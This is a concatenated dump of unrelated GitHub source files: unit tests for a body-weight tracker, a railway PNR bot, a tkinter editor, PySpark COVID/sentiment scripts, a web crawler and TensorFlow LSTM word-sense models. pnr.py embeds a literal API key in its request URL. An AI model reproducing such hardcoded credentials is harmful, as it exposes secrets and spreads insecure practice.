self.input_values = [str(path)]
self.procedure.get_new_data_from_file(connection=self.connection)
column_dict = db_api.get_table_columns_dict(connection=self.connection,
table=self.procedure.table,
column_names=['body_weight'])
self.assertEqual(column_dict['body_weight'], [100, 100, 100, 100, 100, 10, 20, 30, 40,
50, 60, 70, 80, 90, 100])
# ------------------------------------------------------------------------------------------------------------------
# view_data tests
# ------------------------------------------------------------------------------------------------------------------
def test_view_data_nominal(self):
"""
Creates a plot from body weight entries.
"""
self.procedure.view_data(connection=self.connection)
plot_name = 'body_weight_body_weight_%s.png' % datetime.datetime.now().strftime('%m_%d')
self.assertTrue(os.path.exists(os.path.join(self.logs_dir, plot_name)))
def test_view_data_bad_column_names(self):
"""
Attempts to create a plot with an invalid column name.
"""
self.procedure.view_data(connection=self.connection,
column_names=['bad'])
plot_name = 'body_weight_body_weight_%s.png' % datetime.datetime.now().strftime('%m_%d')
self.assertFalse(os.path.exists(os.path.join(self.logs_dir, plot_name)))
# ------------------------------------------------------------------------------------------------------------------
# table_to_csv tests
# ------------------------------------------------------------------------------------------------------------------
def test_dump_csv_nominal(self):
"""
Creates a csv file from values within the database table.
"""
csv_name = db_api.table_to_csv(connection=self.connection,
table=self.procedure.table,
output_dir=self.logs_dir)
self.assertTrue(os.path.exists(os.path.join(self.logs_dir, csv_name)))
def test_dump_csv_bad_path(self):
"""
Attempts to create a csv file but a bad output path is provided.
:return:
"""
csv_name = db_api.table_to_csv(connection=self.connection,
table=self.procedure.table,
output_dir='bad_path')
self.assertEqual(None, csv_name)
# ----------------------------------------------------------------------------------------------------------------------
# End
# ----------------------------------------------------------------------------------------------------------------------
```
#### File: tests/Util/test_config.py
```python
import unittest
import tempfile
import os
import shutil
import logging
from src.Util.config import Config
from src.Util.constants import Constants
class TestConfig(unittest.TestCase):
"""
Class for testing the body weight procedure.
"""
def setUp(self):
"""
Initializes unit test variables.
"""
self.logs_dir = tempfile.mkdtemp()
self.file_path = os.path.join(self.logs_dir, 'test_config.ini')
self.logger = logging.getLogger(__name__)
self.config = Config(logger=self.logger,
output_path=self.logs_dir)
self.section = 'OPTIONS'
self.option = 'water'
def tearDown(self):
"""
Performs any clean up needed.
"""
self.connection = None
if os.path.exists(self.logs_dir):
shutil.rmtree(self.logs_dir)
# ------------------------------------------------------------------------------------------------------------------
# read_config_option tests
# ------------------------------------------------------------------------------------------------------------------
def test_read_config_option_nominal(self):
"""
Checks that the default config file is created properly.
"""
value = self.config.read_config_option(section=self.section,
option=self.option)
self.assertEqual(value, "oz")
def test_read_config_option_bad_option(self):
"""
Attempts to get a bad value in the config file.
"""
with self.assertRaises(KeyError) as error:
self.config.read_config_option(section=self.section,
option="bad")
self.assertTrue('bad' in error.exception)
# ------------------------------------------------------------------------------------------------------------------
# update_config_option tests
# ------------------------------------------------------------------------------------------------------------------
def test_update_config_option_nominal(self):
"""
Updates a config value to be used in the future.
"""
value = 'mL'
status = self.config.update_config_option(section=self.section,
option=self.option,
value=value)
self.assertTrue(status)
water_type = self.config.read_config_option(section=self.section,
option=self.option)
self.assertEqual(value, water_type)
def test_update_config_retain_unique_values(self):
"""
Updating an option should keep unaffected values the same when rewriting.
"""
value = 'mL'
status = self.config.update_config_option(section=self.section,
option=self.option,
value=value)
self.assertTrue(status)
value = '5'
status = self.config.update_config_option(section=self.section,
option='backup_rate',
value=value)
self.assertTrue(status)
water_type = self.config.read_config_option(section=self.section,
option=self.option)
backup_rate = self.config.read_config_option(section=self.section,
option='backup_rate')
self.assertEqual(water_type, 'mL')
self.assertEqual(backup_rate, '5')
def test_update_config_option_bad_section(self):
"""
Attempts to change a config option with a section that does not exist.
"""
status = self.config.update_config_option(section='bad',
option=self.option,
value='mL')
self.assertFalse(status)
def test_update_config_option_bad_option(self):
"""
Attempts to change a config option that does not exist.
"""
status = self.config.update_config_option(section=self.section,
option='bad',
value='mL')
self.assertFalse(status)
# ------------------------------------------------------------------------------------------------------------------
# check_config_file_values tests
# ------------------------------------------------------------------------------------------------------------------
def test_check_config_file_values_nominal(self):
"""
A new default has been added to a section. Add the default value to an already existing config file. The old
config values will remain.
"""
Constants.config_defaults[self.section]['test'] = 'new'
value = 'mL'
status = self.config.update_config_option(section=self.section,
option=self.option,
value=value)
self.assertTrue(status)
self.config.check_config_file_values()
added_default = self.config.read_config_option(section=self.section,
option='test')
self.assertEqual(added_default, 'new')
old_value = self.config.read_config_option(section=self.section,
option=self.option)
self.assertEqual(old_value, 'mL')
# ------------------------------------------------------------------------------------------------------------------
# create_backup_database tests
# ------------------------------------------------------------------------------------------------------------------
def test_create_backup_database_nominal(self):
"""
Creates a backup database when no other backups are present
"""
pass
def test_create_backup_database_already_exists(self):
"""
Checks for a backup database file, and sees that one has been created within the backup rate.
"""
pass
def test_create_backup_database_needed(self):
"""
Checks for a backup database file, one does exist, but a new one is needed.
"""
pass
def test_create_backup_database_no_backup_db_folder(self):
"""
Creates the backup_db folder within the cwd if it does not already exist.
"""
pass
# ----------------------------------------------------------------------------------------------------------------------
# End
# --------------------------------------------------------------------------------------------------------------------
``` |
{
"source": "jia1102x/Anupam-dagaru",
"score": 3
} |
#### File: Anupam-dagaru/omega/pnr.py
```python
import requests
class Pnr(object):
def __init__(self):
self.ids = {}
#json = requests.get("https://api.coinmarketcap.com/v1/ticker/").json()
#for cr in json:
#self.ids[cr["symbol"]] = cr["id"]
def get_pnr(self, pnrno):
try:
json = requests.get("https://api.railwayapi.com/v2/pnr-status/pnr/"+pnrno+"/apikey/qyynupcty2/").json()
passenger = "\n"
            for psg in json["passengers"]:
                passenger += "**" + str(psg["no"]) + "\t" + psg["current_status"] + "\t" + psg["booking_status"] + "**\n"
message = "PNR Number : **{}**\n From : **{}** - **{}**\n To : **{}** - **{}**\nTrain Name :**{}**\nTrain Number :**{}**\nPassengers:{}".format(pnrno, json["from_station"]["code"],json["from_station"]["name"], json["reservation_upto"]["code"],json["reservation_upto"]["name"],json["train"]["name"],json["train"]["number"],passenger)
return message
except KeyError:
message = "Enter a valid PNR number"
return message
```
#### File: Anupam-dagaru/omega/shorturl.py
```python
import requests
import json
class Urlshortener(object):
def __init__(self):
self.req_url = 'https://www.googleapis.com/urlshortener/v1/url?key=<KEY>'
self.headers = {'content-type': 'application/json'}
def get_shorturl(self, content):
self.payload = {'longUrl': content[2]}
self.response = requests.post(self.req_url,data = json.dumps(self.payload), headers=self.headers).json()
return self.response['id']
``` |
{
"source": "jia1995/tkinter_learning",
"score": 3
} |
#### File: tkinter_learning/Imitation vscode editor/textEidtor.py
```python
import tkinter as tk
from tkinter import *
from textwithLine import TextWithLine
def cut(editor, event=None):
k = editor.tag_ranges('sel')
if not k:
idx = editor.index(tk.INSERT)
line = idx.split('.')[0]
editor.tag_add('sel',f'{line}.0',f'{int(line)+1}.0')
editor.event_generate("<<Cut>>")
else:
editor.event_generate("<<Cut>>")
def copy(editor, event=None):
k = editor.tag_ranges('sel')
if not k:
idx = editor.index(tk.INSERT)
line = idx.split('.')[0]
lens = len(editor.get('1.0', tk.END))
editor.tag_add('sel',f'{line}.0',f'{line}.{lens}')
editor.event_generate("<<Copy>>")
editor.tag_remove('sel', '0.0', tk.END)
else:
editor.event_generate("<<Copy>>")
def paste(editor, event=None):
editor.event_generate('<<Paste>>')
def selectAll(editor, event=None):
editor.tag_add('sel','1.0',tk.END)
def undo(editor, event=None):
editor.event_generate('<<Undo>>')
def redo(editor, event=None):
editor.event_generate('<<Redo>>')
class TextEditor(tk.Frame):
def __init__(self, master=None) -> None:
tk.Frame.__init__(self, master)
self.CreateText()
def _create_right_popup_menu(self):
PopupMenu = Menu(self.editbox.text, tearoff=0)
PopupMenu.add_command(label='剪切',command=lambda:cut(self.editbox.text))
PopupMenu.add_command(label='复制',command=lambda:copy(self.editbox.text))
PopupMenu.add_command(label='粘贴',command=lambda:paste(self.editbox.text))
PopupMenu.add_command(label='全选',command=lambda:selectAll(self.editbox.text))
return PopupMenu
def CreateText(self):
self.editbox = TextWithLine(self.master)
self.editbox.pack(expand=YES,side=RIGHT, fill=BOTH)
PopupMenu = self._create_right_popup_menu()
self.editbox.text.bind('<Button-3>',lambda event : PopupMenu.post(event.x_root, event.y_root))
``` |
{
"source": "JiA1996/RBDA_Covid_Tweets_Trend_Analysis",
"score": 3
} |
#### File: RBDA_Covid_Tweets_Trend_Analysis/DeathSentimentCorrelation/death_data_total.py
```python
from pyspark import SparkContext
import numpy as np
import sys, getopt
from pyspark.mllib.stat import Statistics
def parseLine(line):
    # Strip the quote characters and replace any comma that falls inside a
    # quoted CSV field with a space, so the cleaned line can be split on ','.
k = 0
s = ""
for i in line:
if i == "\"":
k += 1
elif i == ",":
if k % 2 == 0:
s += ","
else:
s += " "
else:
s += i
return s
def combineSeries(a, b):
out = []
for i in range(len(a)):
out.append(a[i] + b[i])
return out
def dailyIncrease(l):
out = []
for i in range(1, len(l)):
out.append(int(l[i]) - int(l[i-1]))
return out
if __name__ == "__main__":
cov = sys.argv[1]
senti = sys.argv[2]
#output = sys.argv[2]
sc=SparkContext("local", "death_trend")
covid = sc.textFile(cov).map(lambda line: parseLine(line).split(",")).filter(lambda line: line[-1].isdigit()).map(lambda line: ["global", dailyIncrease(line[60::])]).reduceByKey(combineSeries).collect()
covid = sc.parallelize(covid[0][1])
maximum = covid.max()
covid = covid.map(lambda each: float(each)/float(maximum))
covid.saveAsTextFile("covid")
sent = sc.textFile(senti).map(lambda line: line.split(" ")).map(lambda line: [int(line[0][14:-4]), float(line[3])]).collect()#.saveAsTextFile("senti_processed")
sorted_senti = sorted(sent)
sorted_senti = sc.parallelize(sorted_senti).map(lambda x: x[1])
max_senti = sorted_senti.max()
sorted_senti = sorted_senti.map(lambda x: float(x)/float(max_senti))
sorted_senti.saveAsTextFile("sorted_senti")
#print(sorted_senti)
print(Statistics.corr(covid, sorted_senti))
```
#### File: RBDA_Covid_Tweets_Trend_Analysis/getAvgScore/getAverage.py
```python
import sys
from pathlib import Path
from pyspark import SparkConf, SparkContext
from pyspark.sql import SQLContext
from pyspark import sql
from os import listdir
def main(input_dir, result_path):
conf = SparkConf().setMaster("yarn-client").setAppName("avg").set('spark.executor.memory', '4G').set('spark.driver.memory', '4G').set('spark.driver.maxResultSize', '4G')
sc = SparkContext(conf=conf)
sqlContext = sql.SQLContext(sc)
with open(result_path, "a") as f:
for file in listdir(input_dir):
sum = None
count = None
with open(input_dir + "/" + file) as in_f:
lines = in_f.read().splitlines()
rdd = sc.parallelize(lines)
row_rdd = rdd.map(lambda line: line.split(",")).filter(lambda line: len(line) == 2)
sum = row_rdd.map(lambda line: (float(line[1]))).sum()
count = row_rdd.count()
in_f.close()
f.write(file + " " + str(sum) + " " + str(count) + " " + str(sum / count) +"\n")
f.close()
if __name__ == "__main__":
main(sys.argv[1], sys.argv[2])
``` |
{
"source": "jia1/cs2309",
"score": 3
} |
#### File: jia1/cs2309/crawl.py
```python
from collections import deque
import data
import parse
import requests
import similarity
import time
seeds = deque(["https://en.wikipedia.org/wiki/Main_Page"])
searches = data.searches
def initSeeds(root, url):
length = len(root)
def isSite(link):
return link != root and root in link
def sliceLink(link):
return link[length:]
seeds = filter(isSite, parse.parseLinks(url))
seeds = deque(map(sliceLink, seeds))
print(seeds)
def initTopics(selector, url):
topics = parse.parseClass(selector, url)
print(topics)
def bfsCrawlWrite(frontier, iterations):
frontier = deque(frontier)
relevant, threshold = [], 2/3
    indent1 = ' ' * 2
indent2, indent3 = indent1 * 2, indent1 * 3
indent4 = indent2 * 2
i = 0
with open('similarity.json', 'w') as f:
f.write('[\n%s[\n%s""' % (indent1, indent2))
while frontier and i < iterations:
f.write(',\n%s{\n' % (indent2))
url = frontier.popleft()
resp = requests.get(url)
topics = parse.parseKeywords(resp)
f.write('%s"": ""' % (indent3))
for topic in topics:
relevant = False
stringBuilder = []
stringBuilder.append(',\n%s"%s": [\n' % (indent3, topic))
for search in searches:
try:
score = similarity.getSim(search, topic)
if score >= threshold:
relevant = True
stringBuilder.append('%s"(%s, %s)",\n' % (indent4, \
search, score))
except:
continue
if relevant:
stringBuilder[-1] = stringBuilder[-1].rstrip()[:-1]
stringBuilder.append('\n')
f.write(''.join(stringBuilder))
f.write('%s]' % (indent3))
frontier.extend(deque(parse.parseLinks(resp)))
f.write('\n%s}\n%s]' % (indent2, indent1))
if frontier and i < iterations:
f.write(',')
else:
break
i += 1
f.write('\n]')
f.close()
def bfsCrawl(frontier, iterations):
frontier = deque(frontier)
lowLim, uppLim = 3/5, 4/5
i, numVisited, urlVisited = 0, 0, set()
while frontier and i < iterations:
url = frontier.popleft()
urlVisited.add(url)
host = parse.getDomain(url)
resp = requests.get(url)
topics = parse.parseKeywords(resp)
for topic in topics:
for search in searches:
try:
score = similarity.getSim(search, topic)
                    if lowLim < score < uppLim:
print(str((score, search, topic, url)))
except:
continue
frontier.extend(deque(parse.parseLinks(resp) - urlVisited))
numVisited += 1
i += 1
return (len(frontier), numVisited)
def dfsCrawl(stack, iterations):
stack = deque(stack)
lowLim, uppLim = 3/5, 4/5
depthMax, lastHost = 3, ""
depthLeft = depthMax
i, numVisited, urlVisited = 0, 0, set()
while stack and i < iterations:
url = stack.pop()
urlVisited.add(url)
resp = requests.get(url)
topics = parse.parseKeywords(resp)
for topic in topics:
for search in searches:
try:
score = similarity.getSim(search, topic)
                    if lowLim < score < uppLim:
print(str((score, search, topic, url)))
except:
continue
host = parse.getDomain(url)
if host == lastHost:
if depthLeft:
depthLeft -= 1
stack.extend(deque(parse.parseLinks(resp)))
else:
depthLeft = depthMax
else:
depthLeft = depthMax
            stack.extend(deque(parse.parseLinks(resp) - urlVisited))
        lastHost = host
numVisited += 1
i += 1
return (len(stack), numVisited)
# TEST
def test():
iterations = 100
print("Iterations: %d" % iterations)
print()
start = time.time()
queueSize, bfsnumVisited = bfsCrawl(seeds, iterations)
print("Size of Queue: %d" % queueSize)
print("Number of numVisited: %d" % bfsnumVisited)
print("Time Taken: %f" % (time.time() - start))
print()
start = time.time()
stackSize, dfsnumVisited = dfsCrawl(seeds, iterations)
    print("Size of Stack: %d" % stackSize)
print("Number of numVisited: %d" % dfsnumVisited)
print("Time Taken: %f" % (time.time() - start))
print()
# test()
```
#### File: jia1/cs2309/parse.py
```python
from bs4 import BeautifulSoup
from time import time
from urllib.parse import urlparse
import requests
import math
import rake, random, re
rakeInstance = rake.Rake('./Resources/RAKE/SmartStoplist.txt')
specialString = ['//', ' ', '\\']
# kgr
# 2012, March 8
# Get Domain Name from URL
# http://stackoverflow.com/questions/9626535/get-domain-name-from-url
def getDomain(url):
parsed = urlparse(url)
domain = '{uri.scheme}://{uri.netloc}'.format(uri = parsed)
return domain
def parseClass(className, url):
def alphaOrSpace(string):
return all(c.isalpha() or c.isspace() for c in string)
    resp = requests.get(url)
    html = resp.text
soup = BeautifulSoup(html, 'lxml')
elem = soup.select('.' + className)
elem = map(lambda x: x.string, elem)
elem = filter(lambda x: alphaOrSpace(x), elem)
# return list(map(lambda x: x.replace(' ', '_'), elem))
return list(map(lambda x: x.split(' '), elem))
# Adapted from <NAME>. (2014)
def parseLinks(resp):
domain = getDomain(resp.url)
soup = BeautifulSoup(resp.text, "lxml", from_encoding = resp.encoding)
edges = set()
for link in soup.find_all('a', href = True):
u = link['href']
if u and u[0] not in ['#', '?']:
if u[0] == '/':
u = domain + u
edges.add(u)
return edges
def parseKeywords(resp): return replaceSpace(parseRake(parseText(resp)))
# Adapted from <NAME>. & <NAME>. (2016)
def parseText(resp):
html = resp.text
soup = BeautifulSoup(html, 'lxml')
resultSetText = soup.findAll(text = True)
tags = ['style', 'script', '[document]', 'head', 'title']
def isVisible(doc):
string = str(doc)
return len(doc) >= 3 and \
not (doc.parent.name in tags
or re.match('<!--.*-->', string))
def stripString(navigableString):
stripped = navigableString.strip()
encoded = stripped.encode('utf-8')
string = str(encoded)
finalString = ""
for s in re.findall("'([^']*)'", string):
if isShort(s):
finalString = randomHash
else:
finalString += s
return finalString
def isReadable(string):
return string != randomHash \
and not any(special in string for special in specialString)
def isShort(string): return len(string) < 3
visible = filter(isVisible, resultSetText)
randomHash = str(random.getrandbits(128))
strippedStrings = map(stripString, visible)
listText = filter(isReadable, strippedStrings)
return ', '.join(listText)
def parseRake(string): return rakeInstance.run(string)
def replaceSpace(rakeOutput):
return map(lambda w: w[0].split(' '), rakeOutput)
# TEST
def test():
strt = time()
example = "http://www.comp.nus.edu.sg/"
resp = requests.get(example)
text = parseText(resp)
keywords = parseKeywords(resp)
print("DOMAIN:\t%s\n" % getDomain(example))
print("LINKS:\t%s\n" % (parseLinks(resp)))
print("TEXT:\t%s\n" % text)
print("WORDS:\t%s\n" % list(keywords))
print("TIME:\t%f\t\n" % (time() - strt), end = '\n')
# test()
``` |
{
"source": "jia1/lstm_wsd",
"score": 3
} |
#### File: jia1/lstm_wsd/glove.py
```python
import numpy as np
glove_dir = './data/glove.6B/'
def load_glove(size):
path = glove_dir + 'glove.6B.' + str(size) + 'd.txt'
wordvecs = {}
with open(path, 'r') as file:
lines = file.readlines()
for line in lines:
tokens = line.split(' ')
vec = np.array(tokens[1:], dtype=np.float32)
wordvecs[tokens[0]] = vec
return wordvecs
def fill_with_gloves(word_to_id, emb_size, wordvecs=None):
if not wordvecs:
wordvecs = load_glove(emb_size)
n_words = len(word_to_id)
res = np.zeros([n_words, emb_size], dtype=np.float32)
n_not_found = 0
for word, id in word_to_id.iteritems():
if word in wordvecs:
res[id, :] = wordvecs[word]
else:
n_not_found += 1
res[id, :] = np.random.normal(0.0, 0.1, emb_size)
print 'n words not found in glove word vectors: ' + str(n_not_found)
return res
```
#### File: jia1/lstm_wsd/gossip.py
```python
import time
import re
import sys
import smtplib
from email.mime.text import MIMEText
import socket
host_name = socket.gethostname()
if len(sys.argv) < 3:
sys.exit('run_id password')
pwd = sys.argv[2]
run_id = sys.argv[1]
path = '/home/salomons/project/wsd/smac-output/scenario/live-rundata-' + str(run_id) + '.json'
bests = [1000.0]
def send_email(bests):
print 'New best found: %f. Sending email.' % bests[-1]
msg = MIMEText('computer name: %s\nrun_id: %s\nhistory: %s' % (host_name, run_id, str(bests)))
# me == the sender's email address
# you == the recipient's email address
msg['Subject'] = 'New best: %f' % bests[-1]
msg['From'] = from_ = '<EMAIL>'
msg['To'] = to_ = '<EMAIL>'
# Send the message via our own SMTP server, but don't include the
# envelope header.
s = smtplib.SMTP('smtp.office365.com', 587)
s.starttls()
s.login("<EMAIL>", pwd)
s.sendmail(from_, [to_], msg.as_string())
s.quit()
while True:
with open(path, 'r') as file:
doc = file.read()
        qualities = re.findall(r'"r-quality" : [-+.,\d]+', doc)
q = []
for quality in qualities:
q.append(float(quality.split(' ')[-1].replace(',', '')))
if q:
candidate = min(q)
if candidate < bests[-1]:
bests.append(candidate)
send_email(bests)
time.sleep(240)
```
#### File: jia1/lstm_wsd/model2.py
```python
from data import *
from glove import *
import tensorflow as tf
import tensorflow.models.rnn.rnn_cell as rnn_cell
from sklearn.cross_validation import train_test_split
import os
import glob
# rm old log files
for file in glob.glob('/home/salomons/tmp/tf.log/*'):
os.remove(file)
# config
train_path = '/data/senseval2/eng-lex-sample.training.xml'
test_path = '/data/senseval2/eng-lex-samp.evaluation.xml'
# load data
train_data = load_senteval2_data(train_path)
test_data = load_senteval2_data(test_path)
print 'Dataset size (train/test): %d / %d' % (len(train_data), len(test_data))
# build vocab utils
word_to_id = build_vocab(train_data)
target_word_to_id, target_sense_to_id, n_words, n_senses_from_target_id = build_sense_ids(train_data)
print 'Vocabulary size: %d' % len(word_to_id)
# make numeric
train_ndata = convert_to_numeric(train_data, word_to_id, target_word_to_id, target_sense_to_id, n_senses_from_target_id)
test_ndata = convert_to_numeric(test_data, word_to_id, target_word_to_id, target_sense_to_id, n_senses_from_target_id)
n_step_f = 40
n_step_b = 40
print 'n_step forward/backward: %d / %d' % (n_step_f, n_step_b)
class Model:
def __init__(self, is_first, is_training, target_id, batch_size, n_step_f, n_step_b, init_word_vecs=None):
n_senses = n_senses_from_target_id[target_id]
self.inputs_f = tf.placeholder(tf.int32, shape=[batch_size, n_step_f])
self.inputs_b = tf.placeholder(tf.int32, shape=[batch_size, n_step_b])
# self.target_ids = tf.placeholder(tf.int32, shape=[batch_size])
self.sense_ids = tf.placeholder(tf.int32, shape=[batch_size, n_senses])
n_units = 100
state_size = 2 * n_units
reuse = None if is_first else True
vocab_size = len(word_to_id)
embedding_size = 100
def embedding_initializer(vec, dtype):
            return init_word_vecs if init_word_vecs is not None else tf.random_uniform([vocab_size, embedding_size], -.1, .1, dtype)
with tf.variable_scope('emb', reuse):
embeddings = tf.get_variable('embeddings', [vocab_size, embedding_size], initializer=embedding_initializer)
target_scope_reuse = None if is_training else True
with tf.variable_scope(str(target_id), target_scope_reuse):
W_target = tf.get_variable('W_target', [state_size*2, n_senses], tf.float32)
b_target = tf.get_variable('b_target', [1, n_senses])
keep_prop = 0.5
with tf.variable_scope("forward", reuse):
f_lstm = rnn_cell.DropoutWrapper(rnn_cell.BasicLSTMCell(n_units), output_keep_prob=keep_prop)
f_state = tf.Variable(tf.zeros([batch_size, state_size]), trainable=False)
# tf.get_variable('f_state',
# [batch_size, state_size],
# initializer=tf.constant_initializer(0.0),
# trainable=False)
# run inputs through lstm
inputs_f = tf.split(1, n_step_f, self.inputs_f)
for time_step, inputs_ in enumerate(inputs_f):
if time_step > 0:
tf.get_variable_scope().reuse_variables()
emb = tf.nn.embedding_lookup(embeddings, tf.squeeze(inputs_))
_, f_state = f_lstm(emb, f_state)
with tf.variable_scope("backward", reuse):
b_lstm = rnn_cell.DropoutWrapper(rnn_cell.BasicLSTMCell(n_units), output_keep_prob=keep_prop)
# b_state = b_lstm.zero_state(None, tf.float32)
b_state = tf.Variable(tf.zeros([batch_size, state_size]), trainable=False)
# b_state = tf.get_variable('b_state',
# [batch_size, state_size],
# initializer=tf.constant_initializer(0.0),
# trainable=False)
inputs_b = tf.split(1, n_step_b, self.inputs_b)
for time_step, inputs_ in enumerate(inputs_b):
if time_step > 0:
tf.get_variable_scope().reuse_variables()
emb = tf.nn.embedding_lookup(embeddings, tf.squeeze(inputs_))
_, b_state = b_lstm(emb, b_state)
concat_state = tf.concat(1, [f_state, b_state])
state = tf.nn.dropout(concat_state, keep_prop) if is_training else concat_state
logits = tf.matmul(state, W_target) + b_target
self.cost_op = tf.nn.softmax_cross_entropy_with_logits(logits, tf.cast(self.sense_ids, tf.float32))
self.accuracy_op = tf.reduce_mean(tf.cast(tf.equal(tf.arg_max(logits, 1), tf.arg_max(self.sense_ids, 1)), tf.float32))
if not is_training:
return
grads = tf.gradients(self.cost_op, W_target)
for grad in grads:
print tf.shape(grad)
tf.histogram_summary('grad_W_target', grads[0])
tf.scalar_summary('frac_0_grad_W', tf.nn.zero_fraction(grads[0]))
print 'TRAINABLE VARIABLES'
tvars = tf.trainable_variables()
for tvar in tvars:
print tvar.name
# max_grad_norm = 10
# grads, _ = tf.clip_by_global_norm(tf.gradients(self.cost_op, tvars), max_grad_norm)
# optimizer = tf.train.AdagradOptimizer(.5)
# self.train_op = optimizer.apply_gradients(zip(grads, tvars))
self.train_op = tf.train.AdagradOptimizer(0.2).minimize(self.cost_op)
self.summary_op = tf.merge_all_summaries()
def run_epoch(session, models, data_, mode):
cost = 0.
accuracy = 0.
summaries = []
n_batches = 0
for target_id, data in data_.iteritems():
xf, xb, sense_ids = data
print sense_ids.shape
model = models[target_id]
print tf.shape(model.sense_ids)
if mode == 'train':
ops = [model.cost_op, model.accuracy_op, model.summary_op, model.train_op]
elif mode == 'val':
ops = [model.cost_op, model.accuracy_op]
else:
raise ValueError('unknown mode')
fetches = session.run(ops, {
model.inputs_f: xf,
model.inputs_b: xb,
model.sense_ids: sense_ids
})
cost += fetches[0]
accuracy += fetches[1]
if mode == 'train':
summaries.append(fetches[2])
n_batches += 1
print '%s ::: cost: %f, accuracy: %f' % (mode.upper(), cost, accuracy)
if mode == 'train':
return summaries
if __name__ == '__main__':
n_epochs = 500
grouped_by_target = group_by_target(train_ndata)
train_data, val_data = split_grouped(grouped_by_target, .2, 2)
train_data = batchify_grouped(train_data, n_step_f, n_step_b, word_to_id['<pad>'], n_senses_from_target_id)
val_data = batchify_grouped(val_data, n_step_f, n_step_b, word_to_id['<pad>'], n_senses_from_target_id)
init_emb = fill_with_gloves(word_to_id, 100)
train_models = {}
val_models = {}
is_first = True
for target_id in grouped_by_target.keys()[:3]:
batch_size_train = len(train_data[target_id][2])
train_models[target_id] = Model(is_first, True, target_id, batch_size_train, n_step_f, n_step_b, init_emb)
is_first = False
batch_size_val = len(val_data[target_id][2])
val_models[target_id] = Model(is_first, False, target_id, batch_size_val, n_step_f, n_step_b, None)
session = tf.Session()
session.run(tf.initialize_all_variables())
summary_op = tf.merge_all_summaries()
writer = tf.train.SummaryWriter('/home/salomons/tmp/tf.log', session.graph_def, flush_secs=10)
for i in range(n_epochs):
print 'EPOCH: %d' % i
summaries = run_epoch(session, train_models, train_data, mode='train')
run_epoch(session, val_models, val_data, mode='val')
for batch_idx, summary in enumerate(summaries):
writer.add_summary(summary)
```
#### File: jia1/lstm_wsd/model.py
```python
from data import *
from glove import *
import tensorflow as tf
from tensorflow.python.ops import rnn_cell
from sklearn.cross_validation import train_test_split
class Model:
def __init__(self, is_training, conf, n_senses_from_target_id, word_to_id, init_word_vecs=None, skip_train_emb=0):
batch_size = conf['batch_size']
n_step_f = conf['n_step_f']
n_step_b = conf['n_step_b']
n_units = conf['n_lstm_units']
n_layers = conf['n_layers']
forget_bias = conf['forget_bias']
train_init_state = conf['train_init_state']
emb_base_std = conf['emb_base_std']
input_keep_prob = conf['input_keep_prob']
embedding_size = conf['embedding_size']
state_size = conf['state_size']
keep_prob = conf['keep_prob']
w_penalty = conf.get('w_penalty')
lr_start = 2.
lr_decay_factor = 0.99
lr_min = 0.1
print 'n_step forward/backward: %d / %d' % (n_step_f, n_step_b)
self.dbg = {}
self.batch_size = batch_size
self.is_training = is_training
self.inputs_f = tf.placeholder(tf.int32, shape=[batch_size, n_step_f])
self.inputs_b = tf.placeholder(tf.int32, shape=[batch_size, n_step_b])
self.train_target_ids = train_target_ids = tf.placeholder(tf.int32, shape=[batch_size])
self.train_sense_ids = train_sense_ids = tf.placeholder(tf.int32, shape=[batch_size])
global_step = tf.Variable(1.0, trainable=False)
tot_n_senses = sum(n_senses_from_target_id.values())
# self.train_labels = labels = tf.placeholder(tf.float32, shape=[batch_size, tot_n_senses])
vocab_size = len(word_to_id)
def embedding_initializer(vec, dtype):
return init_word_vecs if init_word_vecs is not None else tf.random_uniform([vocab_size, embedding_size],
-.1, .1, dtype)
with tf.variable_scope('emb'):
self.dbg['embeddings'] = embeddings = tf.get_variable('embeddings', [vocab_size, embedding_size],
initializer=embedding_initializer,
trainable=conf['train_embeddings'])
mean_embeddings = tf.reduce_mean(embeddings, 0, keep_dims=True)
self.dbg['std_emb'] = std_embeddings = tf.sqrt(tf.reduce_mean(tf.square(embeddings - mean_embeddings), 0))
print 'Avg n senses per target word: ' + str(tot_n_senses / len(n_senses_from_target_id))
n_senses_sorted_by_target_id = [n_senses_from_target_id[target_id] for target_id
in range(len(n_senses_from_target_id))]
n_senses_sorted_by_target_id_tf = tf.constant(n_senses_sorted_by_target_id, tf.int32)
_W_starts = (np.cumsum(np.append([0], n_senses_sorted_by_target_id)) * state_size)[:-1]
_W_lenghts = np.array(n_senses_sorted_by_target_id) * state_size
W_starts = tf.constant(_W_starts, tf.int32)
W_lengths = tf.constant(_W_lenghts, tf.int32)
_b_starts = (np.cumsum(np.append([0], n_senses_sorted_by_target_id)))[:-1]
_b_lengths = np.array(n_senses_sorted_by_target_id)
b_starts = tf.constant(_b_starts, tf.int32)
b_lengths = tf.constant(_b_lengths, tf.int32)
with tf.variable_scope('target_params', initializer=tf.random_uniform_initializer(-.1, .1)):
W_target = tf.get_variable('W_target', [tot_n_senses * state_size], dtype=tf.float32)
b_target = tf.get_variable('b_target', [tot_n_senses], dtype=tf.float32,
initializer=tf.constant_initializer(0.0))
with tf.variable_scope("forward"):
f_lstm = rnn_cell.BasicLSTMCell(n_units,
forget_bias=forget_bias) # LSTMCell(n_units, embedding_size, use_peepholes=True, initializer=tf.random_uniform_initializer(-.1, .1))
if is_training:
f_lstm = rnn_cell.DropoutWrapper(f_lstm, input_keep_prob=input_keep_prob)
f_lstm = rnn_cell.MultiRNNCell([f_lstm] * n_layers)
f_state = tf.get_variable('f_init_state', [batch_size, 2 * n_units * n_layers]) \
if train_init_state else f_lstm.zero_state(batch_size, tf.float32)
inputs_f = tf.split(1, n_step_f, self.inputs_f)
for time_step, inputs_ in enumerate(inputs_f):
if time_step > 0:
tf.get_variable_scope().reuse_variables()
emb = tf.nn.embedding_lookup(embeddings, tf.squeeze(inputs_))
if is_training:
emb = emb + std_embeddings * tf.random_normal([batch_size, embedding_size], stddev=emb_base_std)
_, f_state = f_lstm(emb, f_state)
with tf.variable_scope("backward"):
b_lstm = rnn_cell.BasicLSTMCell(n_units,
forget_bias=forget_bias) # LSTMCell(n_units, embedding_size, use_peepholes=True, initializer=tf.random_uniform_initializer(-.1, .1))
if is_training:
b_lstm = rnn_cell.DropoutWrapper(b_lstm, input_keep_prob=input_keep_prob)
b_lstm = rnn_cell.MultiRNNCell([b_lstm] * n_layers)
b_state = tf.get_variable('b_init_state', [batch_size, 2 * n_units * n_layers]) \
if train_init_state else b_lstm.zero_state(batch_size, tf.float32)
inputs_b = tf.split(1, n_step_b, self.inputs_b)
for time_step, inputs_ in enumerate(inputs_b):
if time_step > 0:
tf.get_variable_scope().reuse_variables()
emb = tf.nn.embedding_lookup(embeddings, tf.squeeze(inputs_))
if is_training:
